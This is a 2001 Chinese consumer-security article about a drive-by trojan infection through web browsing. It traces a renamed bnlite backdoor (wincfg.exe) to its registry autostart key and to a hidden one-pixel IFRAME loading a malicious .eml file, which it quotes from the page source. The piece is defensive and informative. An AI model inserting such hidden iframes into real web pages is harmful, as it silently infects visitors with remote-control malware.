当心!浏览网页也会中木马
2001-08-23 10:17:35· ·小蓉··yesky
如果我对你说浏览网页也会感染木马,你相信吗?
其实,这已经不是相信不相信的问题了,在半年前就有人使用这种技术来使人中招了!最近听说有人在浏览某个网站时中招,因此去那里看了看,在网页打开的过程中,鼠标奇怪的变成沙漏形状,看来的确是有程序在运行。打开计算机的任务管理器,可以看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe,在win98下为c:\windows\wincfg.exe。运行注册表编辑器regedit,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run发现wincfg.exe,哈哈,原来它将自己登记在注册表开机启动项中,这样每次开机都会自动运行wincfg.exe!
注:给你下套的人可以自己设定这个木马的启动键名和注册文件名,注册文件名也就是运行时进程里的名称,因此大家看到的结果可能不相同。
运行金山毒霸,报告发现“backdoor bnlite”,哦,原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大(只有6.5K),但它的功能可不少:具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信(报告服务端所在的IP地址)、上传下载……如果你中了该木马,那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务,这样别人就有全部权限进入你的电脑了!控制你的电脑将非常容易!
让我感兴趣的是,木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”,将ActiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,哈哈!这回wincfg.exe不再下载了。
我们来看看wincfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的一句:
IFRAME src="wincfg.eml" width=1 height=1
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!